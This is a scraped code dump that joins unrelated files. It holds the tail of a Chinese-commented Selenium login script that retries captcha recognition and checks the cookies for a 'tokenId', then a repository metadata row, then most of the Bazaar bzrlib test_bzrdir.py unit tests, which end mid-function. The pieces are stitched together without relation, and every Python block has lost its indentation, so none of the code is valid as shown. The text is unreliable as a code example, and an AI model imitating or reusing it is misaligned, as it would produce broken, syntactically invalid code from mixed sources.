# 定时等待5秒,如果验证码识别错误,提示验证码错误需要等一会儿才能继续操作
time.sleep(5)
# 获取cookie,并把cookie转化为字符串格式
cookie1 = str(driver.get_cookies())
print(cookie1)
# 第二次用正则表达式,同样有点粗糙,代码实现的功能就是看cookie里是否有tokenId这个词,如果有说明登录成功,跳出循环,可以进行后面的自动化操作,如果没有,则表示登录失败,继续识别验证码
matchObj = re.search(r'tokenId', cookie1, re.M | re.I)
if matchObj:
print(matchObj.group())
break
else:
print("No match!!")
print('结束')
|
1065865483/0python_script
|
test/imag_test.py
|
Python
|
mit
| 3,355
| 0.001257
|
# Copyright (C) 2006-2011 Canonical Ltd
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Tests for the BzrDir facility and any format specific tests.
For interface contract tests, see tests/per_bzr_dir.
"""
import os
import subprocess
import sys
from bzrlib import (
branch,
bzrdir,
config,
controldir,
errors,
help_topics,
lock,
repository,
revision as _mod_revision,
osutils,
remote,
transport as _mod_transport,
urlutils,
win32utils,
workingtree_3,
workingtree_4,
)
import bzrlib.branch
from bzrlib.branchfmt.fullhistory import BzrBranchFormat5
from bzrlib.errors import (
NotBranchError,
NoColocatedBranchSupport,
UnknownFormatError,
UnsupportedFormatError,
)
from bzrlib.tests import (
TestCase,
TestCaseWithMemoryTransport,
TestCaseWithTransport,
TestSkipped,
)
from bzrlib.tests import(
http_server,
http_utils,
)
from bzrlib.tests.test_http import TestWithTransport_pycurl
from bzrlib.transport import (
memory,
pathfilter,
)
from bzrlib.transport.http._urllib import HttpTransport_urllib
from bzrlib.transport.nosmart import NoSmartTransportDecorator
from bzrlib.transport.readonly import ReadonlyTransportDecorator
from bzrlib.repofmt import knitrepo, knitpack_repo
class TestDefaultFormat(TestCase):
def test_get_set_default_format(self):
old_format = bzrdir.BzrDirFormat.get_default_format()
# default is BzrDirMetaFormat1
self.assertIsInstance(old_format, bzrdir.BzrDirMetaFormat1)
controldir.ControlDirFormat._set_default_format(SampleBzrDirFormat())
# creating a bzr dir should now create an instrumented dir.
try:
result = bzrdir.BzrDir.create('memory:///')
self.assertIsInstance(result, SampleBzrDir)
finally:
controldir.ControlDirFormat._set_default_format(old_format)
self.assertEqual(old_format, bzrdir.BzrDirFormat.get_default_format())
class DeprecatedBzrDirFormat(bzrdir.BzrDirFormat):
"""A deprecated bzr dir format."""
class TestFormatRegistry(TestCase):
def make_format_registry(self):
my_format_registry = controldir.ControlDirFormatRegistry()
my_format_registry.register('deprecated', DeprecatedBzrDirFormat,
'Some format. Slower and unawesome and deprecated.',
deprecated=True)
my_format_registry.register_lazy('lazy', 'bzrlib.tests.test_bzrdir',
'DeprecatedBzrDirFormat', 'Format registered lazily',
deprecated=True)
bzrdir.register_metadir(my_format_registry, 'knit',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit1',
'Format using knits',
)
my_format_registry.set_default('knit')
bzrdir.register_metadir(my_format_registry,
'branch6',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3',
'Experimental successor to knit. Use at your own risk.',
branch_format='bzrlib.branch.BzrBranchFormat6',
experimental=True)
bzrdir.register_metadir(my_format_registry,
'hidden format',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3',
'Experimental successor to knit. Use at your own risk.',
branch_format='bzrlib.branch.BzrBranchFormat6', hidden=True)
my_format_registry.register('hiddendeprecated', DeprecatedBzrDirFormat,
'Old format. Slower and does not support things. ', hidden=True)
my_format_registry.register_lazy('hiddenlazy', 'bzrlib.tests.test_bzrdir',
'DeprecatedBzrDirFormat', 'Format registered lazily',
deprecated=True, hidden=True)
return my_format_registry
def test_format_registry(self):
my_format_registry = self.make_format_registry()
my_bzrdir = my_format_registry.make_bzrdir('lazy')
self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat)
my_bzrdir = my_format_registry.make_bzrdir('deprecated')
self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat)
my_bzrdir = my_format_registry.make_bzrdir('default')
self.assertIsInstance(my_bzrdir.repository_format,
knitrepo.RepositoryFormatKnit1)
my_bzrdir = my_format_registry.make_bzrdir('knit')
self.assertIsInstance(my_bzrdir.repository_format,
knitrepo.RepositoryFormatKnit1)
my_bzrdir = my_format_registry.make_bzrdir('branch6')
self.assertIsInstance(my_bzrdir.get_branch_format(),
bzrlib.branch.BzrBranchFormat6)
def test_get_help(self):
my_format_registry = self.make_format_registry()
self.assertEqual('Format registered lazily',
my_format_registry.get_help('lazy'))
self.assertEqual('Format using knits',
my_format_registry.get_help('knit'))
self.assertEqual('Format using knits',
my_format_registry.get_help('default'))
self.assertEqual('Some format. Slower and unawesome and deprecated.',
my_format_registry.get_help('deprecated'))
def test_help_topic(self):
topics = help_topics.HelpTopicRegistry()
registry = self.make_format_registry()
topics.register('current-formats', registry.help_topic,
'Current formats')
topics.register('other-formats', registry.help_topic,
'Other formats')
new = topics.get_detail('current-formats')
rest = topics.get_detail('other-formats')
experimental, deprecated = rest.split('Deprecated formats')
self.assertContainsRe(new, 'formats-help')
self.assertContainsRe(new,
':knit:\n \(native\) \(default\) Format using knits\n')
self.assertContainsRe(experimental,
':branch6:\n \(native\) Experimental successor to knit')
self.assertContainsRe(deprecated,
':lazy:\n \(native\) Format registered lazily\n')
self.assertNotContainsRe(new, 'hidden')
def test_set_default_repository(self):
default_factory = controldir.format_registry.get('default')
old_default = [k for k, v in controldir.format_registry.iteritems()
if v == default_factory and k != 'default'][0]
controldir.format_registry.set_default_repository('dirstate-with-subtree')
try:
self.assertIs(controldir.format_registry.get('dirstate-with-subtree'),
controldir.format_registry.get('default'))
self.assertIs(
repository.format_registry.get_default().__class__,
knitrepo.RepositoryFormatKnit3)
finally:
controldir.format_registry.set_default_repository(old_default)
def test_aliases(self):
a_registry = controldir.ControlDirFormatRegistry()
a_registry.register('deprecated', DeprecatedBzrDirFormat,
'Old format. Slower and does not support stuff',
deprecated=True)
a_registry.register('deprecatedalias', DeprecatedBzrDirFormat,
'Old format. Slower and does not support stuff',
deprecated=True, alias=True)
self.assertEqual(frozenset(['deprecatedalias']), a_registry.aliases())
class SampleBranch(bzrlib.branch.Branch):
"""A dummy branch for guess what, dummy use."""
def __init__(self, dir):
self.bzrdir = dir
class SampleRepository(bzrlib.repository.Repository):
"""A dummy repo."""
def __init__(self, dir):
self.bzrdir = dir
class SampleBzrDir(bzrdir.BzrDir):
"""A sample BzrDir implementation to allow testing static methods."""
def create_repository(self, shared=False):
"""See ControlDir.create_repository."""
return "A repository"
def open_repository(self):
"""See ControlDir.open_repository."""
return SampleRepository(self)
def create_branch(self, name=None):
"""See ControlDir.create_branch."""
if name is not None:
raise NoColocatedBranchSupport(self)
return SampleBranch(self)
def create_workingtree(self):
"""See ControlDir.create_workingtree."""
return "A tree"
class SampleBzrDirFormat(bzrdir.BzrDirFormat):
"""A sample format
this format is initializable, unsupported to aid in testing the
open and open_downlevel routines.
"""
def get_format_string(self):
"""See BzrDirFormat.get_format_string()."""
return "Sample .bzr dir format."
def initialize_on_transport(self, t):
"""Create a bzr dir."""
t.mkdir('.bzr')
t.put_bytes('.bzr/branch-format', self.get_format_string())
return SampleBzrDir(t, self)
def is_supported(self):
return False
def open(self, transport, _found=None):
return "opened branch."
@classmethod
def from_string(cls, format_string):
return cls()
class BzrDirFormatTest1(bzrdir.BzrDirMetaFormat1):
@staticmethod
def get_format_string():
return "Test format 1"
class BzrDirFormatTest2(bzrdir.BzrDirMetaFormat1):
@staticmethod
def get_format_string():
return "Test format 2"
class TestBzrDirFormat(TestCaseWithTransport):
"""Tests for the BzrDirFormat facility."""
def test_find_format(self):
# is the right format object found for a branch?
# create a branch with a few known format objects.
bzrdir.BzrProber.formats.register(BzrDirFormatTest1.get_format_string(),
BzrDirFormatTest1())
self.addCleanup(bzrdir.BzrProber.formats.remove,
BzrDirFormatTest1.get_format_string())
bzrdir.BzrProber.formats.register(BzrDirFormatTest2.get_format_string(),
BzrDirFormatTest2())
self.addCleanup(bzrdir.BzrProber.formats.remove,
BzrDirFormatTest2.get_format_string())
t = self.get_transport()
self.build_tree(["foo/", "bar/"], transport=t)
def check_format(format, url):
format.initialize(url)
t = _mod_transport.get_transport_from_path(url)
found_format = bzrdir.BzrDirFormat.find_format(t)
self.assertIsInstance(found_format, format.__class__)
check_format(BzrDirFormatTest1(), "foo")
check_format(BzrDirFormatTest2(), "bar")
def test_find_format_nothing_there(self):
self.assertRaises(NotBranchError,
bzrdir.BzrDirFormat.find_format,
_mod_transport.get_transport_from_path('.'))
def test_find_format_unknown_format(self):
t = self.get_transport()
t.mkdir('.bzr')
t.put_bytes('.bzr/branch-format', '')
self.assertRaises(UnknownFormatError,
bzrdir.BzrDirFormat.find_format,
_mod_transport.get_transport_from_path('.'))
def test_register_unregister_format(self):
format = SampleBzrDirFormat()
url = self.get_url()
# make a bzrdir
format.initialize(url)
# register a format for it.
bzrdir.BzrProber.formats.register(format.get_format_string(), format)
# which bzrdir.Open will refuse (not supported)
self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open, url)
# which bzrdir.open_containing will refuse (not supported)
self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open_containing, url)
# but open_downlevel will work
t = _mod_transport.get_transport_from_url(url)
self.assertEqual(format.open(t), bzrdir.BzrDir.open_unsupported(url))
# unregister the format
bzrdir.BzrProber.formats.remove(format.get_format_string())
# now open_downlevel should fail too.
self.assertRaises(UnknownFormatError, bzrdir.BzrDir.open_unsupported, url)
def test_create_branch_and_repo_uses_default(self):
format = SampleBzrDirFormat()
branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url(),
format=format)
self.assertTrue(isinstance(branch, SampleBranch))
def test_create_branch_and_repo_under_shared(self):
# creating a branch and repo in a shared repo uses the
# shared repository
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_and_repo(
self.get_url('child'), format=format)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_and_repo_under_shared_force_new(self):
# creating a branch and repo in a shared repo can be forced to
# make a new repo
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url('child'),
force_new_repo=True,
format=format)
branch.bzrdir.open_repository()
def test_create_standalone_working_tree(self):
format = SampleBzrDirFormat()
# note this is deliberately readonly, as this failure should
# occur before any writes.
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_standalone_workingtree,
self.get_readonly_url(), format=format)
tree = bzrdir.BzrDir.create_standalone_workingtree('.',
format=format)
self.assertEqual('A tree', tree)
def test_create_standalone_working_tree_under_shared_repo(self):
# create standalone working tree always makes a repo.
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
# note this is deliberately readonly, as this failure should
# occur before any writes.
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_standalone_workingtree,
self.get_readonly_url('child'), format=format)
tree = bzrdir.BzrDir.create_standalone_workingtree('child',
format=format)
tree.bzrdir.open_repository()
def test_create_branch_convenience(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience('.', format=format)
branch.bzrdir.open_workingtree()
branch.bzrdir.open_repository()
def test_create_branch_convenience_possible_transports(self):
"""Check that the optional 'possible_transports' is recognized"""
format = controldir.format_registry.make_bzrdir('knit')
t = self.get_transport()
branch = bzrdir.BzrDir.create_branch_convenience(
'.', format=format, possible_transports=[t])
branch.bzrdir.open_workingtree()
branch.bzrdir.open_repository()
def test_create_branch_convenience_root(self):
"""Creating a branch at the root of a fs should work."""
self.vfs_transport_factory = memory.MemoryServer
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience(self.get_url(),
format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
branch.bzrdir.open_repository()
def test_create_branch_convenience_under_shared_repo(self):
# inside a repo the default convenience output is a branch+ follow the
# repo tree policy
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
format=format)
branch.bzrdir.open_workingtree()
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_force_no_tree(self):
# inside a repo the default convenience output is a branch+ follow the
# repo tree policy but we can override that
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_tree=False, format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_no_tree_policy(self):
# inside a repo the default convenience output is a branch+ follow the
# repo tree policy
format = controldir.format_registry.make_bzrdir('knit')
repo = self.make_repository('.', shared=True, format=format)
repo.set_make_working_trees(False)
branch = bzrdir.BzrDir.create_branch_convenience('child',
format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_no_tree_policy_force_tree(self):
# inside a repo the default convenience output is a branch+ follow the
# repo tree policy but we can override that
format = controldir.format_registry.make_bzrdir('knit')
repo = self.make_repository('.', shared=True, format=format)
repo.set_make_working_trees(False)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_tree=True, format=format)
branch.bzrdir.open_workingtree()
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_force_new_repo(self):
# inside a repo the default convenience output is overridable to give
# repo+branch+tree
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_repo=True, format=format)
branch.bzrdir.open_repository()
branch.bzrdir.open_workingtree()
class TestRepositoryAcquisitionPolicy(TestCaseWithTransport):
def test_acquire_repository_standalone(self):
"""The default acquisition policy should create a standalone branch."""
my_bzrdir = self.make_bzrdir('.')
repo_policy = my_bzrdir.determine_repository_policy()
repo, is_new = repo_policy.acquire_repository()
self.assertEqual(repo.bzrdir.root_transport.base,
my_bzrdir.root_transport.base)
self.assertFalse(repo.is_shared())
def test_determine_stacking_policy(self):
parent_bzrdir = self.make_bzrdir('.')
child_bzrdir = self.make_bzrdir('child')
parent_bzrdir.get_config().set_default_stack_on('http://example.org')
repo_policy = child_bzrdir.determine_repository_policy()
self.assertEqual('http://example.org', repo_policy._stack_on)
def test_determine_stacking_policy_relative(self):
parent_bzrdir = self.make_bzrdir('.')
child_bzrdir = self.make_bzrdir('child')
parent_bzrdir.get_config().set_default_stack_on('child2')
repo_policy = child_bzrdir.determine_repository_policy()
self.assertEqual('child2', repo_policy._stack_on)
self.assertEqual(parent_bzrdir.root_transport.base,
repo_policy._stack_on_pwd)
def prepare_default_stacking(self, child_format='1.6'):
parent_bzrdir = self.make_bzrdir('.')
child_branch = self.make_branch('child', format=child_format)
parent_bzrdir.get_config().set_default_stack_on(child_branch.base)
new_child_transport = parent_bzrdir.transport.clone('child2')
return child_branch, new_child_transport
def test_clone_on_transport_obeys_stacking_policy(self):
child_branch, new_child_transport = self.prepare_default_stacking()
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport)
self.assertEqual(child_branch.base,
new_child.open_branch().get_stacked_on_url())
def test_default_stacking_with_stackable_branch_unstackable_repo(self):
# Make stackable source branch with an unstackable repo format.
source_bzrdir = self.make_bzrdir('source')
knitpack_repo.RepositoryFormatKnitPack1().initialize(source_bzrdir)
source_branch = bzrlib.branch.BzrBranchFormat7().initialize(
source_bzrdir)
# Make a directory with a default stacking policy
parent_bzrdir = self.make_bzrdir('parent')
stacked_on = self.make_branch('parent/stacked-on', format='pack-0.92')
parent_bzrdir.get_config().set_default_stack_on(stacked_on.base)
# Clone source into directory
target = source_bzrdir.clone(self.get_url('parent/target'))
def test_format_initialize_on_transport_ex_stacked_on(self):
# trunk is a stackable format. Note that its in the same server area
# which is what launchpad does, but not sufficient to exercise the
# general case.
trunk = self.make_branch('trunk', format='1.9')
t = self.get_transport('stacked')
old_fmt = controldir.format_registry.make_bzrdir('pack-0.92')
repo_name = old_fmt.repository_format.network_name()
# Should end up with a 1.9 format (stackable)
repo, control, require_stacking, repo_policy = \
old_fmt.initialize_on_transport_ex(t,
repo_format_name=repo_name, stacked_on='../trunk',
stack_on_pwd=t.base)
if repo is not None:
# Repositories are open write-locked
self.assertTrue(repo.is_write_locked())
self.addCleanup(repo.unlock)
else:
repo = control.open_repository()
self.assertIsInstance(control, bzrdir.BzrDir)
opened = bzrdir.BzrDir.open(t.base)
if not isinstance(old_fmt, remote.RemoteBzrDirFormat):
self.assertEqual(control._format.network_name(),
old_fmt.network_name())
self.assertEqual(control._format.network_name(),
opened._format.network_name())
self.assertEqual(control.__class__, opened.__class__)
self.assertLength(1, repo._fallback_repositories)
def test_sprout_obeys_stacking_policy(self):
child_branch, new_child_transport = self.prepare_default_stacking()
new_child = child_branch.bzrdir.sprout(new_child_transport.base)
self.assertEqual(child_branch.base,
new_child.open_branch().get_stacked_on_url())
def test_clone_ignores_policy_for_unsupported_formats(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport)
self.assertRaises(errors.UnstackableBranchFormat,
new_child.open_branch().get_stacked_on_url)
def test_sprout_ignores_policy_for_unsupported_formats(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.sprout(new_child_transport.base)
self.assertRaises(errors.UnstackableBranchFormat,
new_child.open_branch().get_stacked_on_url)
def test_sprout_upgrades_format_if_stacked_specified(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.sprout(new_child_transport.base,
stacked=True)
self.assertEqual(child_branch.bzrdir.root_transport.base,
new_child.open_branch().get_stacked_on_url())
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertFalse(repo.supports_rich_root())
def test_clone_on_transport_upgrades_format_if_stacked_on_specified(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport,
stacked_on=child_branch.bzrdir.root_transport.base)
self.assertEqual(child_branch.bzrdir.root_transport.base,
new_child.open_branch().get_stacked_on_url())
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertFalse(repo.supports_rich_root())
def test_sprout_upgrades_to_rich_root_format_if_needed(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='rich-root-pack')
new_child = child_branch.bzrdir.sprout(new_child_transport.base,
stacked=True)
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertTrue(repo.supports_rich_root())
def test_add_fallback_repo_handles_absolute_urls(self):
stack_on = self.make_branch('stack_on', format='1.6')
repo = self.make_repository('repo', format='1.6')
policy = bzrdir.UseExistingRepository(repo, stack_on.base)
policy._add_fallback(repo)
def test_add_fallback_repo_handles_relative_urls(self):
stack_on = self.make_branch('stack_on', format='1.6')
repo = self.make_repository('repo', format='1.6')
policy = bzrdir.UseExistingRepository(repo, '.', stack_on.base)
policy._add_fallback(repo)
def test_configure_relative_branch_stacking_url(self):
stack_on = self.make_branch('stack_on', format='1.6')
stacked = self.make_branch('stack_on/stacked', format='1.6')
policy = bzrdir.UseExistingRepository(stacked.repository,
'.', stack_on.base)
policy.configure_branch(stacked)
self.assertEqual('..', stacked.get_stacked_on_url())
def test_relative_branch_stacking_to_absolute(self):
stack_on = self.make_branch('stack_on', format='1.6')
stacked = self.make_branch('stack_on/stacked', format='1.6')
policy = bzrdir.UseExistingRepository(stacked.repository,
'.', self.get_readonly_url('stack_on'))
policy.configure_branch(stacked)
self.assertEqual(self.get_readonly_url('stack_on'),
stacked.get_stacked_on_url())
class ChrootedTests(TestCaseWithTransport):
"""A support class that provides readonly urls outside the local namespace.
This is done by checking if self.transport_server is a MemoryServer. if it
is then we are chrooted already, if it is not then an HttpServer is used
for readonly urls.
"""
def setUp(self):
super(ChrootedTests, self).setUp()
if not self.vfs_transport_factory == memory.MemoryServer:
self.transport_readonly_server = http_server.HttpServer
def local_branch_path(self, branch):
return os.path.realpath(urlutils.local_path_from_url(branch.base))
def test_open_containing(self):
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_containing,
self.get_readonly_url(''))
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_containing,
self.get_readonly_url('g/p/q'))
control = bzrdir.BzrDir.create(self.get_url())
branch, relpath = bzrdir.BzrDir.open_containing(self.get_readonly_url(''))
self.assertEqual('', relpath)
branch, relpath = bzrdir.BzrDir.open_containing(self.get_readonly_url('g/p/q'))
self.assertEqual('g/p/q', relpath)
def test_open_containing_tree_branch_or_repository_empty(self):
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_containing_tree_branch_or_repository,
self.get_readonly_url(''))
def test_open_containing_tree_branch_or_repository_all(self):
self.make_branch_and_tree('topdir')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'topdir/foo')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('topdir', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'foo')
def test_open_containing_tree_branch_or_repository_no_tree(self):
self.make_branch('branch')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'branch/foo')
self.assertEqual(tree, None)
self.assertEqual(os.path.realpath('branch'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('branch', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'foo')
def test_open_containing_tree_branch_or_repository_repo(self):
self.make_repository('repo')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'repo')
self.assertEqual(tree, None)
self.assertEqual(branch, None)
self.assertEqual(
osutils.realpath(os.path.join('repo', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, '')
def test_open_containing_tree_branch_or_repository_shared_repo(self):
self.make_repository('shared', shared=True)
bzrdir.BzrDir.create_branch_convenience('shared/branch',
force_new_tree=False)
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'shared/branch')
self.assertEqual(tree, None)
self.assertEqual(os.path.realpath('shared/branch'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('shared', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, '')
def test_open_containing_tree_branch_or_repository_branch_subdir(self):
self.make_branch_and_tree('foo')
self.build_tree(['foo/bar/'])
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'foo/bar')
self.assertEqual(os.path.realpath('foo'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('foo'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('foo', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'bar')
def test_open_containing_tree_branch_or_repository_repo_subdir(self):
self.make_repository('bar')
self.build_tree(['bar/baz/'])
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'bar/baz')
self.assertEqual(tree, None)
self.assertEqual(branch, None)
self.assertEqual(
osutils.realpath(os.path.join('bar', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'baz')
def test_open_containing_from_transport(self):
self.assertRaises(NotBranchError,
bzrdir.BzrDir.open_containing_from_transport,
_mod_transport.get_transport_from_url(self.get_readonly_url('')))
self.assertRaises(NotBranchError,
bzrdir.BzrDir.open_containing_from_transport,
_mod_transport.get_transport_from_url(
self.get_readonly_url('g/p/q')))
control = bzrdir.BzrDir.create(self.get_url())
branch, relpath = bzrdir.BzrDir.open_containing_from_transport(
_mod_transport.get_transport_from_url(
self.get_readonly_url('')))
self.assertEqual('', relpath)
branch, relpath = bzrdir.BzrDir.open_containing_from_transport(
_mod_transport.get_transport_from_url(
self.get_readonly_url('g/p/q')))
self.assertEqual('g/p/q', relpath)
def test_open_containing_tree_or_branch(self):
self.make_branch_and_tree('topdir')
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
'topdir/foo')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertIs(tree.bzrdir, branch.bzrdir)
self.assertEqual('foo', relpath)
# opening from non-local should not return the tree
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
self.get_readonly_url('topdir/foo'))
self.assertEqual(None, tree)
self.assertEqual('foo', relpath)
# without a tree:
self.make_branch('topdir/foo')
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
'topdir/foo')
self.assertIs(tree, None)
self.assertEqual(os.path.realpath('topdir/foo'),
self.local_branch_path(branch))
self.assertEqual('', relpath)
def test_open_tree_or_branch(self):
self.make_branch_and_tree('topdir')
tree, branch = bzrdir.BzrDir.open_tree_or_branch('topdir')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertIs(tree.bzrdir, branch.bzrdir)
# opening from non-local should not return the tree
tree, branch = bzrdir.BzrDir.open_tree_or_branch(
self.get_readonly_url('topdir'))
self.assertEqual(None, tree)
# without a tree:
self.make_branch('topdir/foo')
tree, branch = bzrdir.BzrDir.open_tree_or_branch('topdir/foo')
self.assertIs(tree, None)
self.assertEqual(os.path.realpath('topdir/foo'),
self.local_branch_path(branch))
def test_open_from_transport(self):
# transport pointing at bzrdir should give a bzrdir with root transport
# set to the given transport
control = bzrdir.BzrDir.create(self.get_url())
t = self.get_transport()
opened_bzrdir = bzrdir.BzrDir.open_from_transport(t)
self.assertEqual(t.base, opened_bzrdir.root_transport.base)
self.assertIsInstance(opened_bzrdir, bzrdir.BzrDir)
def test_open_from_transport_no_bzrdir(self):
t = self.get_transport()
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_from_transport, t)
def test_open_from_transport_bzrdir_in_parent(self):
control = bzrdir.BzrDir.create(self.get_url())
t = self.get_transport()
t.mkdir('subdir')
t = t.clone('subdir')
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_from_transport, t)
def test_sprout_recursive(self):
tree = self.make_branch_and_tree('tree1',
format='development-subtree')
sub_tree = self.make_branch_and_tree('tree1/subtree',
format='development-subtree')
sub_tree.set_root_id('subtree-root')
tree.add_reference(sub_tree)
self.build_tree(['tree1/subtree/file'])
sub_tree.add('file')
tree.commit('Initial commit')
tree2 = tree.bzrdir.sprout('tree2').open_workingtree()
tree2.lock_read()
self.addCleanup(tree2.unlock)
self.assertPathExists('tree2/subtree/file')
self.assertEqual('tree-reference', tree2.kind('subtree-root'))
def test_cloning_metadir(self):
"""Ensure that cloning metadir is suitable"""
bzrdir = self.make_bzrdir('bzrdir')
bzrdir.cloning_metadir()
branch = self.make_branch('branch', format='knit')
format = branch.bzrdir.cloning_metadir()
self.assertIsInstance(format.workingtree_format,
workingtree_4.WorkingTreeFormat6)
def test_sprout_recursive_treeless(self):
tree = self.make_branch_and_tree('tree1',
format='development-subtree')
sub_tree = self.make_branch_and_tree('tree1/subtree',
format='development-subtree')
tree.add_reference(sub_tree)
self.build_tree(['tree1/subtree/file'])
sub_tree.add('file')
tree.commit('Initial commit')
# The following line force the orhaning to reveal bug #634470
tree.branch.get_config_stack().set(
'bzr.transform.orphan_policy', 'move')
tree.bzrdir.destroy_workingtree()
# FIXME: subtree/.bzr is left here which allows the test to pass (or
# fail :-( ) -- vila 20100909
repo = self.make_repository('repo', shared=True,
format='development-subtree')
repo.set_make_working_trees(False)
# FIXME: we just deleted the workingtree and now we want to use it ????
# At a minimum, we should use tree.branch below (but this fails too
# currently) or stop calling this test 'treeless'. Specifically, I've
# turn the line below into an assertRaises when 'subtree/.bzr' is
# orphaned and sprout tries to access the branch there (which is left
# by bzrdir.BzrDirMeta1.destroy_workingtree when it ignores the
# [DeletingParent('Not deleting', u'subtree', None)] conflict). See bug
# #634470. -- vila 20100909
self.assertRaises(errors.NotBranchError,
tree.bzrdir.sprout, 'repo/tree2')
# self.assertPathExists('repo/tree2/subtree')
# self.assertPathDoesNotExist('repo/tree2/subtree/file')
def make_foo_bar_baz(self):
foo = bzrdir.BzrDir.create_branch_convenience('foo').bzrdir
bar = self.make_branch('foo/bar').bzrdir
baz = self.make_branch('baz').bzrdir
return foo, bar, baz
def test_find_bzrdirs(self):
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
